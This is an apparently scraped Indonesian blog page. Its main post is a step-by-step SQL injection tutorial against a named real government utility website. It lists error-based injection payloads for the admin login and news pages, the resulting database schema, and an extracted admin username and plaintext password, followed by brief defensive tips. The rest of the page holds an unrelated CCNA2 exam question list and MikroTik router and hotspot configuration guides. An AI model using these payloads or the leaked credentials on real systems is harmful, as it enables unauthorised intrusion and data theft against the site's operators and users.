05 January 2011

SQL Injection

SQL Injection, step by step
By D-and
Published: April 25, 2007

/*********************************************************
 * SQL Injection, step by step.
 *
 * No Warranty. This tutorial is for educational use only,
 * commercial use is prohibited.
 *
 **********************************************************/

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !!   -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.


******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )


Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

26 April 2010

Final Exam CCNA2 14 maret 2010

1. What are two functions of a router? (Choose two.) 
It connects multiple IP networks.
It controls the flow of data via the use of Layer 2 addresses.
It determines the best path to send packets.
It manages the VLAN database.
It increases the size of the broadcast domain

2. When a router boots, what is the default order to locate the Cisco IOS if there is no boot system command?
ROM, TFTP server, flash
flash, TFTP server, ROM
flash, NVRAM, TFTP server
NVRAM, TFTP server, flash

3. Which router component is used to store the routing table?
Flash
NVRAM
ROM
SDRAM


4. Refer to the exhibit. How many routes are child routes?

1
3
4
6



5. Refer to the exhibit. Which statement is true concerning the routing configuration?
Using dynamic routing instead of static routing would have required fewer configuration steps.
The 10.1.1.0/24 and 10.1.2.0/24 routes have adjacent boundaries and should be summarized.
Packets routed to the R2 Fast Ethernet interface require two routing table lookups.
The static route will not work correctly
6. Refer to the exhibit. The network administrator issues the command no ip classless on Router1. What forwarding action will take place on a packet that is received by Router1 and is destined for host 192.168.0.26?


The packet will be dropped.
The packet will be forwarded to the gateway of last resort.
The packet will match the 192.168.0.0 network and be forwarded out Serial 0/0.
The packet will most closely match the 192.168.0.8 subnet and be forwarded out Serial 0/1


7. Refer to the exhibit. Routers R1 and R3 use different routing protocols with default administrative distance values. All devices are properly configured and the destination network is advertised by both protocols.

Which path will be used to transmit the data packets between PC1 and PC2?
The packets will travel via R2-R1.
The packets will travel via R2-R3.
The traffic will be load-balanced between two paths — via R2-R1 and via R2-R3.
The packets will travel via R2-R3, and the other path via R2-R1 will be retained as the backup path


8. Refer to the exhibit. Router R1 is configured as shown in the exhibit. PC1 on 172.16.1.0/24 network can reach the default gateway on R1. The rest of the routers are configured with the correct IP addresses on the interfaces. Routers R2 and R3 do not have static or dynamic routing enabled. How far will PC1 be able to successfully ping?

router R1 Fa0/0 interface
router R1 S0/0/0 interface
router R2 S0/0/0 interface
router R2 Fa0/0 and S0/0/1 interfaces
router R3 Fa0/0 and S0/0/0 interfaces


9. Refer to the exhibit. All routers are properly configured to use the EIGRP routing protocol with default settings, and the network is fully converged. Which statement correctly describes the path that the traffic will use from the 10.1.1.0/24 network to the 10.1.2.0/24 network?

It will use the A-D path only.
It will use the path A-D, and the paths A-C-D and A-B-D will be retained as the backup paths.
It will use all the paths equally in a round-robin fashion.
The traffic will be load-balanced between A-B-D and A-C-D.

10. Which two statements are true regarding link-state routing protocols? (Choose two.)
They are aware of the complete network topology.
They offer rapid convergence times in large networks.
They do not include subnet masks in their routing updates.
They rely on decreasing hop counts to determine the best path.
They do not work well in networks that require special hierarchical designs.
They pass their entire routing tables to their directly connected neighbors only



11. Refer to the exhibit. R1 knows two routes, Path A and Path B, to the Ethernet network attached to R3. R1 learned Path A to network 10.2.0.0/16 from a static route and Path B to network 10.2.0.0/16 from EIGRP. Which route will R1 install in its routing table?

Both routes are installed and load balancing occurs across both paths.
The route via Path B is installed because the EIGRP route has the best metric to network 10.2.0.0/16.
The route via Path A is installed because the static route has the best metric to network 10.2.0.0/16.
The route via Path B is installed because the EIGRP route has the lowest administrative distance to network 10.2.0.0/16.
The route via Path A is installed because the static route has the lowest administrative distance to network 10.2.0.0/16.
12. What two routing protocols use a hierarchal network topology? (Choose two.)
IS-IS
EIGRP
OSPF
RIPv1
RIPv2



13. Refer to the exhibit. Based on the output from the show running-config and debug ip rip commands, what are two of the routes that are added to the routing table of R1? (Choose two.)

R 192.168.1.0/24 [120/1] via 172.16.2.1, 00:00:24, Serial0/0/1
R 192.168.100.0/24 [120/1] via 172.16.1.1, 00:00:24, Serial0/0/0
S 192.168.1.0/24 [1/0] via FastEthernet0/0
R 192.168.9.0/24 [120/1] via 172.16.2.1, 00:00:24, Serial0/0/0
R 192.168.2.0/24 [120/1] via 172.16.1.2, 00:00:24, Serial0/0/0


14. Refer to the exhibit. The network has three connected routers: R1, R2 and R3. The routes of all three routers are displayed. What can be verified from the output?

R1 and R3 are connected to each other via the S0/0/0 interface.
The IP address of the S0/0/0 interface of R1 is 10.1.1.2.
The IP address of the S0/0/1 interface of R2 is 10.3.3.2.
R2 is connected to the S0/0/1 interface of R3.

15. Refer to the exhibit. All router interfaces are configured with an IP address and are operational. If no routing protocols or static routes are configured, what information will be included in the show ip route command output for router A?

All of the 192.168.x.0 networks will be in the routing table.
Routes to networks 192.168.1.0/24, 192.168.2.0/24, and 192.168.3.0/24 will be in the routing table.
The routing table will be empty because routes and dynamic routes have not been configured.
A default route is automatically installed in the routing table to allow connectivity between the networks.



16. Refer to the exhibit. A network administrator is accessing router R1 from the console port. Once the administrator is connected to the router, which password should the administrator enter at the R1> prompt to access the privileged EXEC mode?

Cisco001
Cisco123
Cisco789
Cisco901


17. Which of the following could describe the devices labeled "?" in the graphic? (Choose three.)

DCE 
CSU/DSU
LAN switch
modem
hub


18. Refer to the exhibit. Which router is advertising subnet 172.16.1.32/28?

Router1
Router2
Router3
Router4

19. Refer to the exhibit. The show cdp neighbors command was run at R1. Which two facts about the newly detected device can be determined from the output? (Choose two.)

ABCD is a router that is connected to R1.
ABCD is a non-CISCO device that is connected to R1.
The device is connected at the Serial0/0/1 interface of R1.
R1 is connected at the S0/0/1 interface of device ABCD.
ABCD does not support switching capability.

20. A static route has been configured on a router. However, the destination network no longer exists. What should an administrator do to remove the static route from the routing table?
Change the routing metric for that route.
Nothing. The static route will go away on its own.
Change the administrative distance for that route.
Remove the route using the no ip route command.


21. Refer to the exhibit. A ping between host A and host B is successful, but pings from host A to operational hosts on the Internet fail. What is the reason for this problem?

The FastEthernet interface of R1 is disabled.
One of the default routes is configured incorrectly.
A routing protocol is not configured on both routers.
The default gateway has not been configured on host A.


22. Refer to the exhibit. The network has three connected routers: R1, R2, and R3. The routes of all three routers are displayed. All routers are operational and pings are not blocked on this network.

Which ping will fail?

from R1 to 172.16.1.1
from R1 to 192.168.3.1
from R2 to 192.168.1.1
from R2 to 192.168.3.1


23. Refer to the exhibit. What action will R2 take for a packet that is destined for 192.168.2.0?
It will drop the packet.

It will forward the packet via the S0/0/0 interface.
It will forward the packet via the Fa0/0 interface.
It will forward the packet to R1


24. Refer to the exhibit. The users on the local network 172.16.1.0/24 complain that they are unable to connect to the Internet. What step should be taken to remedy the problem?

A new static route must be configured on R1 with the R3 serial interface as the next hop.
A new default route must be configured on R1 with the R3 serial interface as the next hop.
The default route on R2 should be configured with the R3 serial interface as the next hop.
The default route on R2 must be replaced with a new static route and the next hop should be the R1 FastEthernet interface


25. Refer to the exhibit. What summary address can Router2 advertise to Router1 to reach the three networks on Routers 3, 4, and 5 without advertising any public address space or overlapping the networks on Router1?

172.16.0.0/8
172.16.0.0/10
172.16.0.0/13
172.16.0.0/20
172.16.0.0/24


26. Refer to the exhibit. Host A is unable to access the Internet, and troubleshooting has revealed that this is due to an addressing problem. What is incorrectly configured in this network?

the IP address of the Fa0/0 interface of R1
the subnet mask of the S0/0/0 interface of R1
the IP address of the S0/0/0 interface of R1
the subnet mask of the S0/0/0 interface of R2

27. Refer to the exhibit. A new PC was deployed in the Sales network. It was given the host address of 192.168.10.31 with a default gateway of 192.168.10.17. The PC is not communicating with the network properly. What is the cause?

The default gateway is incorrect.
The address is in the wrong subnet.
The host address and default gateway are swapped.
192.168.10.31 is the broadcast address for this subnet


28. Refer to the exhibit. The network administrator is planning IP addressing of a new network. What part of this addressing scheme must be changed to allow communication between host A and the server?

the IP address of the server
the default gateway of host A
the IP address of host A
the default gateway of the server

29. Which network design feature requires the deployment of a classless routing protocol?
private IP addressing
advertising default routes
variable length subnet masks
summarization on major network boundaries

30. A network administrator needs to assign the very last usable IP address in the 172.24.64.0/18 network range to the router interface that serves this LAN. Which IP address should the administrator configure on the interface?
172.16.128.154/18
172.16.255.254/18
172.24.64.254/18
172.24.127.254/18


31. Refer to the exhibit. All routers are running RIPv1. The two networks 10.1.1.0/29 and 10.1.1.16/29 are unable to access each other. What can be the cause of this problem?

Because RIPv1 is a classless protocol, it does not support this access.
RIPv1 does not support discontiguous networks.
RIPv1 does not support load balancing.
RIPv1 does not support automatic summarization.



32. Refer to the exhibit. What information can be determined from the highlighted output?

R1 is originating the route 172.30.200.32/28.
Automatic summarization is disabled.
The 172.30.200.16/28 network is one hop away from R1.
A classful routing protocol is being used

33. What does RIP use to reduce convergence time in a larger network?
It uses multicast instead of broadcast to send routing updates.
It reduces the update timer to 15 seconds if there are more than 10 routes.
It uses triggered updates to announce network changes if they happen in between the periodic updates.
It uses random pings to detect if a pathway is down and therefore is preemptive on finding networks that are down


34. A network administrator has enabled RIP on routers B and C in the network diagram. Which of the following commands will prevent RIP updates from being sent to Router A?

A(config)# router rip
A(config-router)# passive-interface S0/0
B(config)# router rip
B(config-router)# network 192.168.25.48
B(config-router)# network 192.168.25.64
A(config)# router rip
A(config-router)# no network 192.168.25.32
B(config)# router rip
B(config-router)# passive-interface S0/0
A(config)# no router rip


35. Refer to the exhibit. Both routers are using the RIP protocol. Devices on the 192.168.1.1 network can ping the S0/0/0 interface on R2 but cannot ping devices on the 192.168.2.1 network.

What is a possible cause of this problem?
The routers are configured with different versions of RIP.
R2 is not forwarding the routing updates.
The R1 configuration should include the no auto-summary command.
The maximum path number has been exceeded.

36. Which two statements are correct about the split horizon with poison reverse method of routing loop prevention? (Choose two.)
It is enabled by default on all Cisco IOS implementations.
It assigns a value that represents an infinite metric to the poisoned route.
It sends back the poisoned route update to the same interface from where it was received.
It instructs routers to hold all changes that might affect routes, for a specified period of time.
It limits the number of hops a packet can traverse through the network before it is discarded


37. Refer to exhibit. Given the topology shown in the exhibit, what three commands are needed to configure EIGRP on the Paris router? (Choose three.)

Paris(config)# router eigrp 100
Paris(config)# router eigrp
Paris(config-router)# network 192.168.6.0
Paris(config-router)# network 192.168.7.0
Paris(config-router)# network 192.168.8.0
Paris(config-router)# network 192.168.9.0

38. A router has EIGRP configured as the only routing protocol. In what way might EIGRP respond if there is no feasible successor route to a destination network and the successor route fails?
It broadcasts hello packets to all routers in the network to re-establish neighbor adjacencies.
It sends queries to adjacent neighbors until a new successor route is found.
It immediately sends its entire routing table to its neighbors.
It will set the metric for the failed route to infinity.

39. Refer to the exhibit. Hosts on the BOS Fa0/0 LAN are able to ping the Fa0/1 interface on the JAX router and all interfaces on the BOS and ORL routers. Why would hosts from the 10.0.0.0/24 network not be able to ping hosts on the Fa0/0 LAN of the JAX router?

The JAX router has the wrong process ID.
The JAX router needs the network 10.0.0.0 0.0.0.255 area 0 command.
The JAX router needs the network 192.168.3.0 0.0.0.255 area 0 command.
The BOS router needs the network 192.168.3.0 0.0.0.255 area 0 command

40. Which three statements describe the operation of routing with EIGRP? (Choose three.)
As new neighbors are discovered, entries are placed in a neighbor table.
If the feasible successor has a higher advertised cost than the current successor route, then it becomes the primary route.
If hello packets are not received within the hold time, DUAL must recalculate the topology.
The reported distance is the distance to a destination as advertised by a neighbor.
EIGRP maintains full knowledge of the network topology in the topology table and exchanges full routing information with neighboring routers in every update.
EIGRP builds one routing table that contains routes for all configured routed protocols.

41. Refer to the exhibit. What happens to a packet that has 172.16.0.0/16 as the best match in the routing table that is shown?

The packet is discarded.
The packet is flooded out all interfaces.
The packet is forwarded via Serial0/0/0.
The packet is forwarded via FastEthernet0/0.

42. A network is configured with the IP, IPX, and AppleTalk protocols. Which routing protocol is recommended for this network?
RIPv1
RIPv2
EIGRP
OSPF


43. Refer to the exhibit. Which two statements are true based on the exhibited output? (Choose two.)

Automatic summarization is disabled.
The EIGRP routing protocol is being used.
There is one feasible successor in the routing table.
The serial interface S0/0/0 is administratively down.
The router is originating the route to 172.16.1.0/24 via the S0/0/0 interface


44. Refer to the exhibit. Two routers are unable to establish an adjacency. What is the possible cause for this?

The two routers are connected on a multiaccess network.

The hello and dead intervals are different on the two routers.
They have different OSPF router IDs.
They have different process IDs

45. What command would the network administrator apply to a router that is running OSPF to advertise the entire range of addresses included in 172.16.0.0/19 in area 0?
R1(config-router)# network 172.16.0.0 0.0.0.255 area 0
R1(config-router)# network 172.16.0.0 0.0.3.255 area 0
R1(config-router)# network 172.16.0.0 0.0.15.255 area 0
R1(config-router)# network 172.16.0.0 0.0.31.255 area 0

46. What should be considered when troubleshooting a problem with the establishment of neighbor relationships between OSPF routers? (Choose two.)
OSPF interval timers mismatch
administrative distance mismatch
interface network type mismatch
no loopback interface configured
gateway of last resort not redistributed


47. Which two components are used to determine the router ID in the configuration of the OSPF routing process? (Choose two.)
the IP address of the first FastEthernet interface
the highest IP address of any logical interface
the highest IP address of any physical interface
the default gateway IP address
the priority value of 1 on any physical interface

48. What is the function of the OSPF LSR packet?
It is used to confirm the receipt of LSUs.
It is used to establish and maintain adjacency with other OSPF routers.
It is used by the receiving routers to request more information about any entry in the DBD.
It is used to check the database synchronization between routers.


49. Refer to the exhibit. All interfaces are configured with the correct IP addresses and subnet masks. OSPF has been configured as the routing protocol. During troubleshooting, it is determined that hosts on network B can ping the Lo0 interface on R1 but are unable to reach hosts on network A. What is the cause of the problem?

Routers R1 and R2 have incorrect router IDs configured.
Router R1 is unable to form a neighbor relationship with router R2.
Routers R1 and R2 have been configured in different OSPF areas.
The configuration of router R1 fails to include network A in the OSPF routing process


50. Refer to the exhibit. The interface addresses and OSPF priorities are configured as shown. Because of the boot order of the routers, router A is currently the DR and router B is the BDR. If router A fails and is replaced the next day by a new router, router D, what OSPF protocol action or actions will happen?

Router D will be elected DR, and router C will become the BDR.
Router D will be elected DR, and router B will remain the BDR.
Router C will become the DR, and router B will become the BDR.
Router B will remain the BDR, and OSPF will function on the segment via the use of only the BDR

25 April 2010

Hotspot Server Setup

Hotspot Server Setup

Setting Ethernet yang konek ke jaringan Internet misal:

/ ip address add address=192.168.1.5/24 network=192.168.1.0 broadcast=192.168.1.255 interface=ether1

Konfigurasi untuk interface yang konek ke jaringan local.

/ ip address add address=10.10.0.1/24 network=10.10.0.0 broadcast=10.10.0.255 interface=ether2

Selanjutnya setting DNS nya kasih centang di "ALLOW REMOTE REQUEST" (konfigurasi ini melewatkan request dari client) sample :



Liat menu ROUTE dan langsung menuju TKP. Kilik tombol + . isikan ip gateway anda. Sample :



Lompat aja ke IP>Hotspot klik Hospot setup.

















Setting mikrotik untuk warnet

Setting mikrotik untuk warnet
mikrotik untuk warnet

ini konfigurasi bagi teman-teman yang mungkin agak kesulitan setting mikrotik.
tinggal di copy trus paste aja di terminal. jadi deh .

step-step

instal pake cd mikrotik
boot dg cd mikrotik
setelah bisa boot pake iso linux, pilih beberapa paket yang dibutuhkan. (kalo bingung centang aja semua)
ikuti aja langkahnya tekan (Yes) (Yes)
setelah restart, login : admin pass : (kosong)
trus copy paste aja tulisan berikut ;


DASAR_______________
system identity set name=warnet.beenet
user set admin password=sukasukalu


ethernet____________________
interface ethernet enable ether1
interface ethernet enable ether2
interface Ethernet set ether1 name=intranet
interface Ethernet set ether2 name=internet


IP ADDRESS_______________
ip address add interface=internet address=XXXXX (dari ISP)
ip address add interface=intranet address=192.168.0.1/24

route_______________
ip route add gateway=XXXXX (dari ISP)

dns___________
ip dns set primary-dns=XXXXX (dari ISP) 2 secondary-dns=XXXXX (dari ISP)

nat & filter firewall standar_______________
ip firewall nat add action=masquerade chain=srcnat
ip firewall filter add chain=input connection-state=invalid action=drop
ip firewall filter add chain=input protocol=udp action=accept
ip firewall filter add chain=input protocol=icmp action=accept
ip firewall filter add chain=input in-interface=intranet action=accept
ip firewall filter add chain=input in-interface=internet action=accept

dhcp server______________________________________
ip dhcp-server setup
dhcp server interface: intranet
dhcp address space: 192.168.0.0/24
gateway for dhcp network: 192.168.0.1
addresses to give out: 192.168.0.2-192.168.0.254
dns servers: XXXXX (dari ISP),XXXXX (dari ISP)
lease time: 3d

web proxy_________________________
ip web-proxy
set enabled=yes
set src-address=0.0.0.0
set port=8080set hostname=proxy-apaaja
set transparent-proxy=yesset parent-proxy=0.0.0.0:0
set cache-administrator=silahkan.pannggil.operator
set max-object-size=4096KiB
set cache-drive=system
set max-cache-size=unlimited
set max-ram-cache-size=unlimited

bikinredirect port ke transparant proxy__________________________
/ip firewall nat add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080
/ip firewall nat add chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080
/ip firewall nat add chain=dstnat protocol=tcp dst-port=8080 action=redirect to-ports=8080

PCQ ________________________
/ip firewall mangle add chain=forward src-address=192.168.169.0/28 action=mark-connection new-connection-mark=client1-cm
/ip firewall mangle add connection-mark=client1-cm action=mark-packet new-packet-mark=client1-pm chain=forward
/queue type add name=downsteam-pcq kind=pcq pcq-classifier=dst-address
/queue type add name=upstream-pcq kind=pcq pcq-classifier=src-address
/queue tree add parent=intranet queue=downsteam-pcq packet-mark=client1-pm
/queue tree add parent=internet queue=upstream-pcq packet-mark=client1-pm

simpel queue______________________________
queue simple add name=kbu-01 target-addresses=192.168.0.11
queue simple add name=kbu-02 target-addresses=192.168.0.12
queue simple add name=kbu-03 target-addresses=192.168.0.13
queue simple add name=kbu-04 target-addresses=192.168.0.14
queue simple add name=kbu-05 target-addresses=192.168.0.15
queue simple add name=kbu-06 target-addresses=192.168.0.16
queue simple add name=kbu-07 target-addresses=192.168.0.17
queue simple add name=kbu-08 target-addresses=192.168.0.18
queue simple add name=kbu-09 target-addresses=192.168.0.19
queue simple add name=kbu-10 target-addresses=192.168.0.20
queue simple add name=xbilling target-addresses=192.168.0.2

BLOX SPAM____________________________
/ip firewall filter add chain=forward dst-port=135-139 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=135-139 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=593 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=4444 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=5554 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=9996 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=995-999 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=53 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=55 protocol=tcp action=drop
TAMBAHAN UNTUK DUA JALUR LINE SPEEDY
/ ip route
add dst-address=0.0.0.0/0 gateway=192.168.1.1,192.168.2.1 check-gateway=ping
/ip firewall nat
add chain=srcnat out-interface=speedy1 action=masquerade
add chain=srcnat out-interface=speedy2 action=masquerade
/ ip firewall mangle
add chain=input in-interface=speedy1 action=mark-connection new-connection-mark=speedy1_conn
add chain=input in-interface=speedy2 action=mark-connection new-connection-mark=speedy2_conn
add chain=output connection-mark=speedy1_conn action=mark-routing new-routing-mark=to_speedy1
add chain=output connection-mark=speedy2_conn action=mark-routing new-routing-mark=to_speedy2
/ ip route
add dst-address=0.0.0.0/0 gateway=192.168.2.1 routing-mark=to_speedy1
add dst-address=0.0.0.0/0 gateway=192.168.1.1 routing-mark=to_speedy2

instal mikrotik RouterOs

instal mikrotik RouterOs
  • Siapkan PC,
    minimal Pentium I RAM 64,HD 500M atau pake flash memory 64
  • Di PC yang telah disiapkan harus ada minimal 2 ethernet, 1 ke arah luar dan 1 lagi ke Network local, diasumsikan sebagai berikut:
    ether1 (yang paling atas atau yang onboard) untuk ke WAN (ISP/Internet)
    ether2 untuk ke jaringan lokal.
  • boot dg cd mikrotik
  • setelah bisa boot pake iso linux, pilih beberapa paket yang dibutuhkan. (kalo bingung centang aja semua)
  • ikuti aja langkahnya tekan (Yes) (Yes)
    setelah restart, login : admin pass : (kosong)
    trus copy paste aja tulisan berikut ;
IP ADDRESS_______________
ip address add interface=ether1 address=XXXXX (ip dari ISP)
ip address add interface=ether2 address=192.168.0.1/24 (ip tergantung keinginan)
route_______________
ip route add gateway=XXXXX (ip gateway dari ISP)
dns___________
ip dns set primary-dns=XXXXX (ip DNS dari ISP)
ip dns set secondary-dns=XXXXX (ip DNS dari ISP)
nat _______________
ip firewall nat add action=masquerade chain=srcnat
selesai .....
sambungkan sebuah client ke router (ether2)
seting :
ip address client 192.168.0.X --> X = nilai 2 sampai 254
subnetmask 255.255.255.0
gateway 192.168.0.1
primary dan secondari DNS tergantung ISP
cek browser internet
jika tidak jalan cek di command prompt
ping 192.168.0.1(cek koneksi ke gateway kita)
